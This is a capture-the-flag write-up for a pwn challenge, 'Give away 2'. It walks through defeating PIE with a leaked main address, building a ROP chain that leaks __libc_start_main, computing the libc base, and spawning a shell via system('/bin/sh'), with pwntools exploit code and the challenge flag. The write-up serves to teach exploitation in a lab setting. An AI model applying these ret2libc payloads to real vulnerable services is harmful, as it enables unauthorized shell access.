Tags: pwn rop
# Give away 2 writeup
## Content
This writeup is about PWN challenge
* libc-2.27.so: shared library (given)
* give_away_2: challenge binary (given)
* ropy_exploit.py: Full exploit

## Binary analysis
Quick check of the binary on ida gives
* main

* vuln

checksec reveal that PIE is enabled which explain the purpose of leaking the address of main. So we can compute the base of the progrma later

## Exploit
The attack will be ret2libc but first we need to leak libc base using rop attack.
1. Step I: leaking `__libc_start_main` address
base_prog = MAIN - 0x864 # compute the program base address based on the main address printed out from the program
PRINTF = elf.plt['printf'] + base_prog
LIBC_START_MAIN = elf.symbols['__libc_start_main'] + base_prog
POP_RDI = 0x0000000000000903 + base_prog
POP_RSI = 0x0000000000000901 + base_prog
RET = 0x0000000000000676 + base_prog
#Overflow buffer until return address
padding = "A"*40
# Create rop chain
rop2 = padding +p64(POP_RDI) + p64(LIBC_START_MAIN) + p64(RET) + p64(PRINTF) + p64(RET)+p64(MAIN)
#Send our rop-chain payload
2. Step II: Parse the leaked address
recieved = p.recvline().strip().split('Give')
leak = u64(recieved[0].ljust(8, "\x00"))
log.info("Leaked libc address, __libc_start_main: %s" % hex(leak))
libc.address = leak - libc.sym["__libc_start_main"]
log.info("Address of libc %s " % hex(libc.address))
3. Step III: Create and send the final rop
BINSH = next(libc.search("/bin/sh"))
SYSTEM = libc.sym["system"]
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))
final_rop = padding + p64(RET) + p64(POP_RDI) + p64(BINSH) + p64(RET) + p64(SYSTEM)
## Notes
* Find the full exploit in `ropy_exploit.py`
* Flag: shkCTF{It's_time_to_get_down_to_business}
* The length of the payload had to be multiple of 16 because the stack should be 16-byes aligned that's why we add RET in the rop chain. Otherwise you'll stuck in the movaps segfault problem (it was my case :') )